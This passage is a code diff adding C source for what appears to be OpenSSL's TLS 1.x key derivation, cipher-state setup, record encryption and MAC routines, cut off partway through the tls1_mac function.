+#include <openssl/evp.h>
+#include <openssl/hmac.h>
+#include <openssl/md5.h>
+#include <openssl/rand.h>
+#ifdef KSSL_DEBUG
+# include <openssl/des.h>
+#endif
+
+/* seed1 through seed5 are virtually concatenated */
+static int tls1_P_hash(const EVP_MD *md, const unsigned char *sec,
+                       int sec_len,
+                       const void *seed1, int seed1_len,
+                       const void *seed2, int seed2_len,
+                       const void *seed3, int seed3_len,
+                       const void *seed4, int seed4_len,
+                       const void *seed5, int seed5_len,
+                       unsigned char *out, int olen)
+{
+    int chunk;
+    size_t j;
+    EVP_MD_CTX ctx, ctx_tmp, ctx_init;
+    EVP_PKEY *mac_key;
+    unsigned char A1[EVP_MAX_MD_SIZE];
+    size_t A1_len;
+    int ret = 0;
+
+    chunk = EVP_MD_size(md);
+    OPENSSL_assert(chunk >= 0);
+
+    EVP_MD_CTX_init(&ctx);
+    EVP_MD_CTX_init(&ctx_tmp);
+    EVP_MD_CTX_init(&ctx_init);
+    EVP_MD_CTX_set_flags(&ctx_init, EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
+    mac_key = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, NULL, sec, sec_len);
+    if (!mac_key)
+        goto err;
+    if (!EVP_DigestSignInit(&ctx_init, NULL, md, NULL, mac_key))
+        goto err;
+    if (!EVP_MD_CTX_copy_ex(&ctx, &ctx_init))
+        goto err;
+    if (seed1 && !EVP_DigestSignUpdate(&ctx, seed1, seed1_len))
+        goto err;
+    if (seed2 && !EVP_DigestSignUpdate(&ctx, seed2, seed2_len))
+        goto err;
+    if (seed3 && !EVP_DigestSignUpdate(&ctx, seed3, seed3_len))
+        goto err;
+    if (seed4 && !EVP_DigestSignUpdate(&ctx, seed4, seed4_len))
+        goto err;
+    if (seed5 && !EVP_DigestSignUpdate(&ctx, seed5, seed5_len))
+        goto err;
+    if (!EVP_DigestSignFinal(&ctx, A1, &A1_len))
+        goto err;
+
+    for (;;) {
+        /* Reinit mac contexts */
+        if (!EVP_MD_CTX_copy_ex(&ctx, &ctx_init))
+            goto err;
+        if (!EVP_DigestSignUpdate(&ctx, A1, A1_len))
+            goto err;
+        if (olen > chunk && !EVP_MD_CTX_copy_ex(&ctx_tmp, &ctx))
+            goto err;
+        if (seed1 && !EVP_DigestSignUpdate(&ctx, seed1, seed1_len))
+            goto err;
+        if (seed2 && !EVP_DigestSignUpdate(&ctx, seed2, seed2_len))
+            goto err;
+        if (seed3 && !EVP_DigestSignUpdate(&ctx, seed3, seed3_len))
+            goto err;
+        if (seed4 && !EVP_DigestSignUpdate(&ctx, seed4, seed4_len))
+            goto err;
+        if (seed5 && !EVP_DigestSignUpdate(&ctx, seed5, seed5_len))
+            goto err;
+
+        if (olen > chunk) {
+            if (!EVP_DigestSignFinal(&ctx, out, &j))
+                goto err;
+            out += j;
+            olen -= j;
+            /* calc the next A1 value */
+            if (!EVP_DigestSignFinal(&ctx_tmp, A1, &A1_len))
+                goto err;
+        } else {                /* last one */
+
+            if (!EVP_DigestSignFinal(&ctx, A1, &A1_len))
+                goto err;
+            memcpy(out, A1, olen);
+            break;
+        }
+    }
+    ret = 1;
+ err:
+    EVP_PKEY_free(mac_key);
+    EVP_MD_CTX_cleanup(&ctx);
+    EVP_MD_CTX_cleanup(&ctx_tmp);
+    EVP_MD_CTX_cleanup(&ctx_init);
+    OPENSSL_cleanse(A1, sizeof(A1));
+    return ret;
+}
+
+/* seed1 through seed5 are virtually concatenated */
+static int tls1_PRF(long digest_mask,
+                    const void *seed1, int seed1_len,
+                    const void *seed2, int seed2_len,
+                    const void *seed3, int seed3_len,
+                    const void *seed4, int seed4_len,
+                    const void *seed5, int seed5_len,
+                    const unsigned char *sec, int slen,
+                    unsigned char *out1, unsigned char *out2, int olen)
+{
+    int len, i, idx, count;
+    const unsigned char *S1;
+    long m;
+    const EVP_MD *md;
+    int ret = 0;
+
+    /* Count number of digests and partition sec evenly */
+    count = 0;
+    for (idx = 0; ssl_get_handshake_digest(idx, &m, &md); idx++) {
+        if ((m << TLS1_PRF_DGST_SHIFT) & digest_mask)
+            count++;
+    }
+    len = slen / count;
+    if (count == 1)
+        slen = 0;
+    S1 = sec;
+    memset(out1, 0, olen);
+    for (idx = 0; ssl_get_handshake_digest(idx, &m, &md); idx++) {
+        if ((m << TLS1_PRF_DGST_SHIFT) & digest_mask) {
+            if (!md) {
+                SSLerr(SSL_F_TLS1_PRF, SSL_R_UNSUPPORTED_DIGEST_TYPE);
+                goto err;
+            }
+            if (!tls1_P_hash(md, S1, len + (slen & 1),
+                             seed1, seed1_len, seed2, seed2_len, seed3,
+                             seed3_len, seed4, seed4_len, seed5, seed5_len,
+                             out2, olen))
+                goto err;
+            S1 += len;
+            for (i = 0; i < olen; i++) {
+                out1[i] ^= out2[i];
+            }
+        }
+    }
+    ret = 1;
+ err:
+    return ret;
+}
+
+static int tls1_generate_key_block(SSL *s, unsigned char *km,
+                                   unsigned char *tmp, int num)
+{
+    int ret;
+    ret = tls1_PRF(ssl_get_algorithm2(s),
+                   TLS_MD_KEY_EXPANSION_CONST,
+                   TLS_MD_KEY_EXPANSION_CONST_SIZE, s->s3->server_random,
+                   SSL3_RANDOM_SIZE, s->s3->client_random, SSL3_RANDOM_SIZE,
+                   NULL, 0, NULL, 0, s->session->master_key,
+                   s->session->master_key_length, km, tmp, num);
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "tls1_generate_key_block() ==> %d byte master_key =\n\t",
+            s->session->master_key_length);
+    {
+        int i;
+        for (i = 0; i < s->session->master_key_length; i++) {
+            fprintf(stderr, "%02X", s->session->master_key[i]);
+        }
+        fprintf(stderr, "\n");
+    }
+#endif                          /* KSSL_DEBUG */
+    return ret;
+}
+
+int tls1_change_cipher_state(SSL *s, int which)
+{
+    static const unsigned char empty[] = "";
+    unsigned char *p, *mac_secret;
+    unsigned char *exp_label;
+    unsigned char tmp1[EVP_MAX_KEY_LENGTH];
+    unsigned char tmp2[EVP_MAX_KEY_LENGTH];
+    unsigned char iv1[EVP_MAX_IV_LENGTH * 2];
+    unsigned char iv2[EVP_MAX_IV_LENGTH * 2];
+    unsigned char *ms, *key, *iv;
+    int client_write;
+    EVP_CIPHER_CTX *dd;
+    const EVP_CIPHER *c;
+#ifndef OPENSSL_NO_COMP
+    const SSL_COMP *comp;
+#endif
+    const EVP_MD *m;
+    int mac_type;
+    int *mac_secret_size;
+    EVP_MD_CTX *mac_ctx;
+    EVP_PKEY *mac_key;
+    int is_export, n, i, j, k, exp_label_len, cl;
+    int reuse_dd = 0;
+
+    is_export = SSL_C_IS_EXPORT(s->s3->tmp.new_cipher);
+    c = s->s3->tmp.new_sym_enc;
+    m = s->s3->tmp.new_hash;
+    mac_type = s->s3->tmp.new_mac_pkey_type;
+#ifndef OPENSSL_NO_COMP
+    comp = s->s3->tmp.new_compression;
+#endif
+
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "tls1_change_cipher_state(which= %d) w/\n", which);
+    fprintf(stderr, "\talg= %ld/%ld, comp= %p\n",
+            s->s3->tmp.new_cipher->algorithm_mkey,
+            s->s3->tmp.new_cipher->algorithm_auth, comp);
+    fprintf(stderr, "\tevp_cipher == %p ==? &d_cbc_ede_cipher3\n", c);
+    fprintf(stderr, "\tevp_cipher: nid, blksz= %d, %d, keylen=%d, ivlen=%d\n",
+            c->nid, c->block_size, c->key_len, c->iv_len);
+    fprintf(stderr, "\tkey_block: len= %d, data= ",
+            s->s3->tmp.key_block_length);
+    {
+        int i;
+        for (i = 0; i < s->s3->tmp.key_block_length; i++)
+            fprintf(stderr, "%02x", s->s3->tmp.key_block[i]);
+        fprintf(stderr, "\n");
+    }
+#endif                          /* KSSL_DEBUG */
+
+    if (which & SSL3_CC_READ) {
+        if (s->s3->tmp.new_cipher->algorithm2 & TLS1_STREAM_MAC)
+            s->mac_flags |= SSL_MAC_FLAG_READ_MAC_STREAM;
+        else
+            s->mac_flags &= ~SSL_MAC_FLAG_READ_MAC_STREAM;
+
+        if (s->enc_read_ctx != NULL)
+            reuse_dd = 1;
+        else if ((s->enc_read_ctx =
+                  OPENSSL_malloc(sizeof(EVP_CIPHER_CTX))) == NULL)
+            goto err;
+        else
+            /*
+             * make sure it's intialized in case we exit later with an error
+             */
+            EVP_CIPHER_CTX_init(s->enc_read_ctx);
+        dd = s->enc_read_ctx;
+        mac_ctx = ssl_replace_hash(&s->read_hash, NULL);
+#ifndef OPENSSL_NO_COMP
+        if (s->expand != NULL) {
+            COMP_CTX_free(s->expand);
+            s->expand = NULL;
+        }
+        if (comp != NULL) {
+            s->expand = COMP_CTX_new(comp->method);
+            if (s->expand == NULL) {
+                SSLerr(SSL_F_TLS1_CHANGE_CIPHER_STATE,
+                       SSL_R_COMPRESSION_LIBRARY_ERROR);
+                goto err2;
+            }
+            if (s->s3->rrec.comp == NULL)
+                s->s3->rrec.comp = (unsigned char *)
+                    OPENSSL_malloc(SSL3_RT_MAX_ENCRYPTED_LENGTH);
+            if (s->s3->rrec.comp == NULL)
+                goto err;
+        }
+#endif
+        /*
+         * this is done by dtls1_reset_seq_numbers for DTLS1_VERSION
+         */
+        if (s->version != DTLS1_VERSION)
+            memset(&(s->s3->read_sequence[0]), 0, 8);
+        mac_secret = &(s->s3->read_mac_secret[0]);
+        mac_secret_size = &(s->s3->read_mac_secret_size);
+    } else {
+        if (s->s3->tmp.new_cipher->algorithm2 & TLS1_STREAM_MAC)
+            s->mac_flags |= SSL_MAC_FLAG_WRITE_MAC_STREAM;
+        else
+            s->mac_flags &= ~SSL_MAC_FLAG_WRITE_MAC_STREAM;
+        if (s->enc_write_ctx != NULL && !SSL_IS_DTLS(s))
+            reuse_dd = 1;
+        else if ((s->enc_write_ctx = EVP_CIPHER_CTX_new()) == NULL)
+            goto err;
+        dd = s->enc_write_ctx;
+        if (SSL_IS_DTLS(s)) {
+            mac_ctx = EVP_MD_CTX_create();
+            if (!mac_ctx)
+                goto err;
+            s->write_hash = mac_ctx;
+        } else
+            mac_ctx = ssl_replace_hash(&s->write_hash, NULL);
+#ifndef OPENSSL_NO_COMP
+        if (s->compress != NULL) {
+            COMP_CTX_free(s->compress);
+            s->compress = NULL;
+        }
+        if (comp != NULL) {
+            s->compress = COMP_CTX_new(comp->method);
+            if (s->compress == NULL) {
+                SSLerr(SSL_F_TLS1_CHANGE_CIPHER_STATE,
+                       SSL_R_COMPRESSION_LIBRARY_ERROR);
+                goto err2;
+            }
+        }
+#endif
+        /*
+         * this is done by dtls1_reset_seq_numbers for DTLS1_VERSION
+         */
+        if (s->version != DTLS1_VERSION)
+            memset(&(s->s3->write_sequence[0]), 0, 8);
+        mac_secret = &(s->s3->write_mac_secret[0]);
+        mac_secret_size = &(s->s3->write_mac_secret_size);
+    }
+
+    if (reuse_dd)
+        EVP_CIPHER_CTX_cleanup(dd);
+
+    p = s->s3->tmp.key_block;
+    i = *mac_secret_size = s->s3->tmp.new_mac_secret_size;
+
+    cl = EVP_CIPHER_key_length(c);
+    j = is_export ? (cl < SSL_C_EXPORT_KEYLENGTH(s->s3->tmp.new_cipher) ?
+                     cl : SSL_C_EXPORT_KEYLENGTH(s->s3->tmp.new_cipher)) : cl;
+    /* Was j=(exp)?5:EVP_CIPHER_key_length(c); */
+    /* If GCM mode only part of IV comes from PRF */
+    if (EVP_CIPHER_mode(c) == EVP_CIPH_GCM_MODE)
+        k = EVP_GCM_TLS_FIXED_IV_LEN;
+    else
+        k = EVP_CIPHER_iv_length(c);
+    if ((which == SSL3_CHANGE_CIPHER_CLIENT_WRITE) ||
+        (which == SSL3_CHANGE_CIPHER_SERVER_READ)) {
+        ms = &(p[0]);
+        n = i + i;
+        key = &(p[n]);
+        n += j + j;
+        iv = &(p[n]);
+        n += k + k;
+        exp_label = (unsigned char *)TLS_MD_CLIENT_WRITE_KEY_CONST;
+        exp_label_len = TLS_MD_CLIENT_WRITE_KEY_CONST_SIZE;
+        client_write = 1;
+    } else {
+        n = i;
+        ms = &(p[n]);
+        n += i + j;
+        key = &(p[n]);
+        n += j + k;
+        iv = &(p[n]);
+        n += k;
+        exp_label = (unsigned char *)TLS_MD_SERVER_WRITE_KEY_CONST;
+        exp_label_len = TLS_MD_SERVER_WRITE_KEY_CONST_SIZE;
+        client_write = 0;
+    }
+
+    if (n > s->s3->tmp.key_block_length) {
+        SSLerr(SSL_F_TLS1_CHANGE_CIPHER_STATE, ERR_R_INTERNAL_ERROR);
+        goto err2;
+    }
+
+    memcpy(mac_secret, ms, i);
+
+    if (!(EVP_CIPHER_flags(c) & EVP_CIPH_FLAG_AEAD_CIPHER)) {
+        mac_key = EVP_PKEY_new_mac_key(mac_type, NULL,
+                                       mac_secret, *mac_secret_size);
+        EVP_DigestSignInit(mac_ctx, NULL, m, NULL, mac_key);
+        EVP_PKEY_free(mac_key);
+    }
+#ifdef TLS_DEBUG
+    printf("which = %04X\nmac key=", which);
+    {
+        int z;
+        for (z = 0; z < i; z++)
+            printf("%02X%c", ms[z], ((z + 1) % 16) ? ' ' : '\n');
+    }
+#endif
+    if (is_export) {
+        /*
+         * In here I set both the read and write key/iv to the same value
+         * since only the correct one will be used :-).
+         */
+        if (!tls1_PRF(ssl_get_algorithm2(s),
+                      exp_label, exp_label_len,
+                      s->s3->client_random, SSL3_RANDOM_SIZE,
+                      s->s3->server_random, SSL3_RANDOM_SIZE,
+                      NULL, 0, NULL, 0,
+                      key, j, tmp1, tmp2, EVP_CIPHER_key_length(c)))
+            goto err2;
+        key = tmp1;
+
+        if (k > 0) {
+            if (!tls1_PRF(ssl_get_algorithm2(s),
+                          TLS_MD_IV_BLOCK_CONST, TLS_MD_IV_BLOCK_CONST_SIZE,
+                          s->s3->client_random, SSL3_RANDOM_SIZE,
+                          s->s3->server_random, SSL3_RANDOM_SIZE,
+                          NULL, 0, NULL, 0, empty, 0, iv1, iv2, k * 2))
+                goto err2;
+            if (client_write)
+                iv = iv1;
+            else
+                iv = &(iv1[k]);
+        }
+    }
+
+    s->session->key_arg_length = 0;
+#ifdef KSSL_DEBUG
+    {
+        int i;
+        fprintf(stderr, "EVP_CipherInit_ex(dd,c,key=,iv=,which)\n");
+        fprintf(stderr, "\tkey= ");
+        for (i = 0; i < c->key_len; i++)
+            fprintf(stderr, "%02x", key[i]);
+        fprintf(stderr, "\n");
+        fprintf(stderr, "\t iv= ");
+        for (i = 0; i < c->iv_len; i++)
+            fprintf(stderr, "%02x", iv[i]);
+        fprintf(stderr, "\n");
+    }
+#endif                          /* KSSL_DEBUG */
+
+    if (EVP_CIPHER_mode(c) == EVP_CIPH_GCM_MODE) {
+        EVP_CipherInit_ex(dd, c, NULL, key, NULL, (which & SSL3_CC_WRITE));
+        EVP_CIPHER_CTX_ctrl(dd, EVP_CTRL_GCM_SET_IV_FIXED, k, iv);
+    } else
+        EVP_CipherInit_ex(dd, c, NULL, key, iv, (which & SSL3_CC_WRITE));
+
+    /* Needed for "composite" AEADs, such as RC4-HMAC-MD5 */
+    if ((EVP_CIPHER_flags(c) & EVP_CIPH_FLAG_AEAD_CIPHER) && *mac_secret_size)
+        EVP_CIPHER_CTX_ctrl(dd, EVP_CTRL_AEAD_SET_MAC_KEY,
+                            *mac_secret_size, mac_secret);
+
+#ifdef OPENSSL_SSL_TRACE_CRYPTO
+    if (s->msg_callback) {
+        int wh = which & SSL3_CC_WRITE ? TLS1_RT_CRYPTO_WRITE : 0;
+        if (*mac_secret_size)
+            s->msg_callback(2, s->version, wh | TLS1_RT_CRYPTO_MAC,
+                            mac_secret, *mac_secret_size,
+                            s, s->msg_callback_arg);
+        if (c->key_len)
+            s->msg_callback(2, s->version, wh | TLS1_RT_CRYPTO_KEY,
+                            key, c->key_len, s, s->msg_callback_arg);
+        if (k) {
+            if (EVP_CIPHER_mode(c) == EVP_CIPH_GCM_MODE)
+                wh |= TLS1_RT_CRYPTO_FIXED_IV;
+            else
+                wh |= TLS1_RT_CRYPTO_IV;
+            s->msg_callback(2, s->version, wh, iv, k, s, s->msg_callback_arg);
+        }
+    }
+#endif
+
+#ifdef TLS_DEBUG
+    printf("which = %04X\nkey=", which);
+    {
+        int z;
+        for (z = 0; z < EVP_CIPHER_key_length(c); z++)
+            printf("%02X%c", key[z], ((z + 1) % 16) ? ' ' : '\n');
+    }
+    printf("\niv=");
+    {
+        int z;
+        for (z = 0; z < k; z++)
+            printf("%02X%c", iv[z], ((z + 1) % 16) ? ' ' : '\n');
+    }
+    printf("\n");
+#endif
+
+    OPENSSL_cleanse(tmp1, sizeof(tmp1));
+    OPENSSL_cleanse(tmp2, sizeof(tmp1));
+    OPENSSL_cleanse(iv1, sizeof(iv1));
+    OPENSSL_cleanse(iv2, sizeof(iv2));
+    return (1);
+ err:
+    SSLerr(SSL_F_TLS1_CHANGE_CIPHER_STATE, ERR_R_MALLOC_FAILURE);
+ err2:
+    return (0);
+}
+
+int tls1_setup_key_block(SSL *s)
+{
+    unsigned char *p1, *p2 = NULL;
+    const EVP_CIPHER *c;
+    const EVP_MD *hash;
+    int num;
+    SSL_COMP *comp;
+    int mac_type = NID_undef, mac_secret_size = 0;
+    int ret = 0;
+
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "tls1_setup_key_block()\n");
+#endif                          /* KSSL_DEBUG */
+
+    if (s->s3->tmp.key_block_length != 0)
+        return (1);
+
+    if (!ssl_cipher_get_evp
+        (s->session, &c, &hash, &mac_type, &mac_secret_size, &comp)) {
+        SSLerr(SSL_F_TLS1_SETUP_KEY_BLOCK, SSL_R_CIPHER_OR_HASH_UNAVAILABLE);
+        return (0);
+    }
+
+    s->s3->tmp.new_sym_enc = c;
+    s->s3->tmp.new_hash = hash;
+    s->s3->tmp.new_mac_pkey_type = mac_type;
+    s->s3->tmp.new_mac_secret_size = mac_secret_size;
+    num =
+        EVP_CIPHER_key_length(c) + mac_secret_size + EVP_CIPHER_iv_length(c);
+    num *= 2;
+
+    ssl3_cleanup_key_block(s);
+
+    if ((p1 = (unsigned char *)OPENSSL_malloc(num)) == NULL) {
+        SSLerr(SSL_F_TLS1_SETUP_KEY_BLOCK, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    s->s3->tmp.key_block_length = num;
+    s->s3->tmp.key_block = p1;
+
+    if ((p2 = (unsigned char *)OPENSSL_malloc(num)) == NULL) {
+        SSLerr(SSL_F_TLS1_SETUP_KEY_BLOCK, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+#ifdef TLS_DEBUG
+    printf("client random\n");
+    {
+        int z;
+        for (z = 0; z < SSL3_RANDOM_SIZE; z++)
+            printf("%02X%c", s->s3->client_random[z],
+                   ((z + 1) % 16) ? ' ' : '\n');
+    }
+    printf("server random\n");
+    {
+        int z;
+        for (z = 0; z < SSL3_RANDOM_SIZE; z++)
+            printf("%02X%c", s->s3->server_random[z],
+                   ((z + 1) % 16) ? ' ' : '\n');
+    }
+    printf("pre-master\n");
+    {
+        int z;
+        for (z = 0; z < s->session->master_key_length; z++)
+            printf("%02X%c", s->session->master_key[z],
+                   ((z + 1) % 16) ? ' ' : '\n');
+    }
+#endif
+    if (!tls1_generate_key_block(s, p1, p2, num))
+        goto err;
+#ifdef TLS_DEBUG
+    printf("\nkey block\n");
+    {
+        int z;
+        for (z = 0; z < num; z++)
+            printf("%02X%c", p1[z], ((z + 1) % 16) ? ' ' : '\n');
+    }
+#endif
+
+    if (!(s->options & SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS)
+        && s->method->version <= TLS1_VERSION) {
+        /*
+         * enable vulnerability countermeasure for CBC ciphers with known-IV
+         * problem (http://www.openssl.org/~bodo/tls-cbc.txt)
+         */
+        s->s3->need_empty_fragments = 1;
+
+        if (s->session->cipher != NULL) {
+            if (s->session->cipher->algorithm_enc == SSL_eNULL)
+                s->s3->need_empty_fragments = 0;
+
+#ifndef OPENSSL_NO_RC4
+            if (s->session->cipher->algorithm_enc == SSL_RC4)
+                s->s3->need_empty_fragments = 0;
+#endif
+        }
+    }
+
+    ret = 1;
+ err:
+    if (p2) {
+        OPENSSL_cleanse(p2, num);
+        OPENSSL_free(p2);
+    }
+    return (ret);
+}
+
+/*-
+ * tls1_enc encrypts/decrypts the record in |s->wrec| / |s->rrec|, respectively.
+ *
+ * Returns:
+ *   0: (in non-constant time) if the record is publically invalid (i.e. too
+ *       short etc).
+ *   1: if the record's padding is valid / the encryption was successful.
+ *   -1: if the record's padding/AEAD-authenticator is invalid or, if sending,
+ *       an internal error occured.
+ */
+int tls1_enc(SSL *s, int send)
+{
+    SSL3_RECORD *rec;
+    EVP_CIPHER_CTX *ds;
+    unsigned long l;
+    int bs, i, j, k, pad = 0, ret, mac_size = 0;
+    const EVP_CIPHER *enc;
+
+    if (send) {
+        if (EVP_MD_CTX_md(s->write_hash)) {
+            int n = EVP_MD_CTX_size(s->write_hash);
+            OPENSSL_assert(n >= 0);
+        }
+        ds = s->enc_write_ctx;
+        rec = &(s->s3->wrec);
+        if (s->enc_write_ctx == NULL)
+            enc = NULL;
+        else {
+            int ivlen;
+            enc = EVP_CIPHER_CTX_cipher(s->enc_write_ctx);
+            /* For TLSv1.1 and later explicit IV */
+            if (SSL_USE_EXPLICIT_IV(s)
+                && EVP_CIPHER_mode(enc) == EVP_CIPH_CBC_MODE)
+                ivlen = EVP_CIPHER_iv_length(enc);
+            else
+                ivlen = 0;
+            if (ivlen > 1) {
+                if (rec->data != rec->input)
+                    /*
+                     * we can't write into the input stream: Can this ever
+                     * happen?? (steve)
+                     */
+                    fprintf(stderr,
+                            "%s:%d: rec->data != rec->input\n",
+                            __FILE__, __LINE__);
+                else if (RAND_bytes(rec->input, ivlen) <= 0)
+                    return -1;
+            }
+        }
+    } else {
+        if (EVP_MD_CTX_md(s->read_hash)) {
+            int n = EVP_MD_CTX_size(s->read_hash);
+            OPENSSL_assert(n >= 0);
+        }
+        ds = s->enc_read_ctx;
+        rec = &(s->s3->rrec);
+        if (s->enc_read_ctx == NULL)
+            enc = NULL;
+        else
+            enc = EVP_CIPHER_CTX_cipher(s->enc_read_ctx);
+    }
+
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "tls1_enc(%d)\n", send);
+#endif                          /* KSSL_DEBUG */
+
+    if ((s->session == NULL) || (ds == NULL) || (enc == NULL)) {
+        memmove(rec->data, rec->input, rec->length);
+        rec->input = rec->data;
+        ret = 1;
+    } else {
+        l = rec->length;
+        bs = EVP_CIPHER_block_size(ds->cipher);
+
+        if (EVP_CIPHER_flags(ds->cipher) & EVP_CIPH_FLAG_AEAD_CIPHER) {
+            unsigned char buf[13], *seq;
+
+            seq = send ? s->s3->write_sequence : s->s3->read_sequence;
+
+            if (SSL_IS_DTLS(s)) {
+                unsigned char dtlsseq[9], *p = dtlsseq;
+
+                s2n(send ? s->d1->w_epoch : s->d1->r_epoch, p);
+                memcpy(p, &seq[2], 6);
+                memcpy(buf, dtlsseq, 8);
+            } else {
+                memcpy(buf, seq, 8);
+                for (i = 7; i >= 0; i--) { /* increment */
+                    ++seq[i];
+                    if (seq[i] != 0)
+                        break;
+                }
+            }
+
+            buf[8] = rec->type;
+            buf[9] = (unsigned char)(s->version >> 8);
+            buf[10] = (unsigned char)(s->version);
+            buf[11] = rec->length >> 8;
+            buf[12] = rec->length & 0xff;
+            pad = EVP_CIPHER_CTX_ctrl(ds, EVP_CTRL_AEAD_TLS1_AAD, 13, buf);
+            if (send) {
+                l += pad;
+                rec->length += pad;
+            }
+        } else if ((bs != 1) && send) {
+            i = bs - ((int)l % bs);
+
+            /* Add weird padding of upto 256 bytes */
+
+            /* we need to add 'i' padding bytes of value j */
+            j = i - 1;
+            if (s->options & SSL_OP_TLS_BLOCK_PADDING_BUG) {
+                if (s->s3->flags & TLS1_FLAGS_TLS_PADDING_BUG)
+                    j++;
+            }
+            for (k = (int)l; k < (int)(l + i); k++)
+                rec->input[k] = j;
+            l += i;
+            rec->length += i;
+        }
+#ifdef KSSL_DEBUG
+        {
+            unsigned long ui;
+            fprintf(stderr,
+                    "EVP_Cipher(ds=%p,rec->data=%p,rec->input=%p,l=%ld) ==>\n",
+                    ds, rec->data, rec->input, l);
+            fprintf(stderr,
+                    "\tEVP_CIPHER_CTX: %d buf_len, %d key_len [%lu %lu], %d iv_len\n",
+                    ds->buf_len, ds->cipher->key_len, DES_KEY_SZ,
+                    DES_SCHEDULE_SZ, ds->cipher->iv_len);
+            fprintf(stderr, "\t\tIV: ");
+            for (i = 0; i < ds->cipher->iv_len; i++)
+                fprintf(stderr, "%02X", ds->iv[i]);
+            fprintf(stderr, "\n");
+            fprintf(stderr, "\trec->input=");
+            for (ui = 0; ui < l; ui++)
+                fprintf(stderr, " %02x", rec->input[ui]);
+            fprintf(stderr, "\n");
+        }
+#endif                          /* KSSL_DEBUG */
+
+        if (!send) {
+            if (l == 0 || l % bs != 0)
+                return 0;
+        }
+
+        i = EVP_Cipher(ds, rec->data, rec->input, l);
+        if ((EVP_CIPHER_flags(ds->cipher) & EVP_CIPH_FLAG_CUSTOM_CIPHER)
+            ? (i < 0)
+            : (i == 0))
+            return -1;          /* AEAD can fail to verify MAC */
+        if (EVP_CIPHER_mode(enc) == EVP_CIPH_GCM_MODE && !send) {
+            rec->data += EVP_GCM_TLS_EXPLICIT_IV_LEN;
+            rec->input += EVP_GCM_TLS_EXPLICIT_IV_LEN;
+            rec->length -= EVP_GCM_TLS_EXPLICIT_IV_LEN;
+        }
+#ifdef KSSL_DEBUG
+        {
+            unsigned long i;
+            fprintf(stderr, "\trec->data=");
+            for (i = 0; i < l; i++)
+                fprintf(stderr, " %02x", rec->data[i]);
+            fprintf(stderr, "\n");
+        }
+#endif                          /* KSSL_DEBUG */
+
+        ret = 1;
+        if (EVP_MD_CTX_md(s->read_hash) != NULL)
+            mac_size = EVP_MD_CTX_size(s->read_hash);
+        if ((bs != 1) && !send)
+            ret = tls1_cbc_remove_padding(s, rec, bs, mac_size);
+        if (pad && !send)
+            rec->length -= pad;
+    }
+    return ret;
+}
+
+int tls1_cert_verify_mac(SSL *s, int md_nid, unsigned char *out)
+{
+    unsigned int ret;
+    EVP_MD_CTX ctx, *d = NULL;
+    int i;
+
+    if (s->s3->handshake_buffer)
+        if (!ssl3_digest_cached_records(s))
+            return 0;
+
+    for (i = 0; i < SSL_MAX_DIGEST; i++) {
+        if (s->s3->handshake_dgst[i]
+            && EVP_MD_CTX_type(s->s3->handshake_dgst[i]) == md_nid) {
+            d = s->s3->handshake_dgst[i];
+            break;
+        }
+    }
+    if (!d) {
+        SSLerr(SSL_F_TLS1_CERT_VERIFY_MAC, SSL_R_NO_REQUIRED_DIGEST);
+        return 0;
+    }
+
+    EVP_MD_CTX_init(&ctx);
+    EVP_MD_CTX_copy_ex(&ctx, d);
+    EVP_DigestFinal_ex(&ctx, out, &ret);
+    EVP_MD_CTX_cleanup(&ctx);
+    return ((int)ret);
+}
+
+int tls1_final_finish_mac(SSL *s,
+                          const char *str, int slen, unsigned char *out)
+{
+    unsigned int i;
+    EVP_MD_CTX ctx;
+    unsigned char buf[2 * EVP_MAX_MD_SIZE];
+    unsigned char *q, buf2[12];
+    int idx;
+    long mask;
+    int err = 0;
+    const EVP_MD *md;
+
+    q = buf;
+
+    if (s->s3->handshake_buffer)
+        if (!ssl3_digest_cached_records(s))
+            return 0;
+
+    EVP_MD_CTX_init(&ctx);
+
+    for (idx = 0; ssl_get_handshake_digest(idx, &mask, &md); idx++) {
+        if (mask & ssl_get_algorithm2(s)) {
+            int hashsize = EVP_MD_size(md);
+            EVP_MD_CTX *hdgst = s->s3->handshake_dgst[idx];
+            if (!hdgst || hashsize < 0
+                || hashsize > (int)(sizeof buf - (size_t)(q - buf))) {
+                /*
+                 * internal error: 'buf' is too small for this cipersuite!
+                 */
+                err = 1;
+            } else {
+                if (!EVP_MD_CTX_copy_ex(&ctx, hdgst) ||
+                    !EVP_DigestFinal_ex(&ctx, q, &i) ||
+                    (i != (unsigned int)hashsize))
+                    err = 1;
+                q += hashsize;
+            }
+        }
+    }
+
+    if (!tls1_PRF(ssl_get_algorithm2(s),
+                  str, slen, buf, (int)(q - buf), NULL, 0, NULL, 0, NULL, 0,
+                  s->session->master_key, s->session->master_key_length,
+                  out, buf2, sizeof buf2))
+        err = 1;
+    EVP_MD_CTX_cleanup(&ctx);
+
+    if (err)
+        return 0;
+    else
+        return sizeof buf2;
+}
+
+int tls1_mac(SSL *ssl, unsigned char *md, int send)
+{
+    SSL3_RECORD *rec;
+    unsigned char *seq;
+    EVP_MD_CTX *hash;
+    size_t md_size, orig_len;
+    int i;
+    EVP_MD_CTX hmac, *mac_ctx;
+    unsigned char header[13];
+    int stream_mac = (send ? (ssl->mac_flags & SSL_MAC_FLAG_WRITE_MAC_STREAM)
+                      : (ssl->mac_flags & SSL_MAC_FLAG_READ_MAC_STREAM));
+    int t;
+
+    if (send) {
+        rec = &(ssl->s3->wrec);
+        seq = &(ssl->s3->write_sequence[0]);
+        hash = ssl->write_hash;
+    } else {
+        rec = &(ssl->s3->rrec);
+        seq = &(ssl->s3->read_sequence[0]);
+        hash = ssl->read_hash;
+    }
+
+    t = EVP_MD_CTX_size(hash);
+    OPENSSL_assert(t >= 0);
+    md_size = t;
+
+    /* I should fix this up TLS TLS TLS TLS TLS XXXXXXXX */
+    if (stream_mac) {
+        mac_ctx = hash;
+    } else {
+        if (!EVP_MD_CTX_copy(&hmac, hash))
+            return -1;
+        mac_ctx = &hmac;
+    }
+
+    if (SSL_IS_DTLS(ssl)) {
+        unsigned char dtlsseq[8], *p = dtlsseq;
+
+        s2n(send ? ssl->d1->w_epoch : ssl->d1->r_epoch, p);
+        memcpy(p, &seq[2], 6);
+
+        memcpy(header, dtlsseq, 8);
+    } else
